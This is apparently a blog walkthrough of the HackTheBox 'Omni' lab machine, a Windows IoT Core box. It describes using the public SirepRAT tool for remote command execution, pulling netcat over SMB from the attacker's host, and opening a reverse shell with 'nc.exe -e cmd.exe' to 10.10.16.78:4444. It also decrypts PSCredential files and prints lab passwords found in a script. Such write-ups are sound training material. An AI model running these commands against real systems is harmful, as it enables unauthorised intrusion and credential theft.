HackTheBox - Omni Walkthrough

System Summary 


Initial Scan

The nmap scan shows some open ports:






It looks a windows machine but with some additional services.

Avoiding bruteforcing of WinRM services on port tcp/5985, we can open the URL http://10.10.10.204:8080 and we see a basic authentication form for “Windows Device Portal”





“Windows Device portal” is a web service that helps to manage IoT devices running Windows IoT Core. 
This portal has a default set of credentials Administrator : p@ssw0rd but they don’t work.

Initial Foothold

Looking for public exploit we can find a public python script named SirepRAT.py  in this github repo: https://github.com/SafeBreach-Labs/SirepRAT.git

It requires python2 and some packages

After cloning the repo and verifying the code, we can run it to execute remote commands.

Below an example of displaying the hosts file:

We can also run other commands like ping
python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\ping.exe" --args "10.10.16.78"


Next step is to get a shell by downloading netcat to the box and running it.

We can try to download netcat via HTTP, but it doesn’t work as expected with the usual techniques

  •         Powershell download
  •         Bitsadmin.exe
  •         Certutil.exe

 As an alternative we can use SMB protocol, by having a public share on our local machine:

python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd 'c:\windows\system32\xcopy' --args '\\10.10.16.78\nik\nc.exe c:\'


Now that we have successfully downloaded nc.exe, we can it for a reverse shell on port 4444:

python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd 'c\nc.exe' --args '-e cmd.exe 10.10.16.78 4444'

But it doesn’t work. 

The problem is that the nc.exe provided in Kali is compiled for x86 while the box is x64 and it doesn’t execute 32 bit PE files.

So let's grab a nc64.exe version from from https://github.com/int0x33/nc.exe and repeat the procedure of upload and execute:


We’re now in the system as user omni$ (low privilege) and we can do some enumeration.

We can search for user.txt and root.txt 

We can read both files (really!) but they're not in the usual format.

Let's look at user.txt



That's an XML file with a PSCredential object inside it.

This is encrypted and we can try to decrypt it with powershell commands:

$credential = Import-CliXml -Path 'C:\data\users\app\user.txt'

This import the file and with the following commands we can show the clear text password: 
$credential.GetNetworkCredential().Password

Unfortunately it doesn't work because we must be logged in as user app... but we're user omni$. 

In the c:\data\users\app folder there are a few other files

hardening.txt is not readable but another xml is...

User Flag

We have to find a way to user app.

Running the standard enumeration commands like get-childitem -hidden -recurse -Path c:\XYZ
we can find a r.bat file in c:\program files\WindowsPowershell\Modules\PackageManagement

It should not be there and it contains a couple of credentials:

  • Username app with password mesh5143
  • Username administrator with password _1nt3rn37ofTh1nGz

These users are not working for WinRM but give us access to the Windows Device Portal site:

We can login and use the section "Processes" to run a command.

In this case we can run the same nc64.exe we were able to execute with the exploit:

We receive a shell as user app.

With it we can access hardening.txt and display its content:


And we can also decrypt the user.txt PScredential file:

And this is the User flag


Root Flag

We can do the same thing as with user app: 

  1. Log into Device Portal as user administrator
  2. Run nc64.exe from the web form
  3. Receive the shell 
  4. open the file root.txt, get the clear text flag using powershell commands seen above



By -
Labels:

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.

Subscribe to: Post Comments (Atom)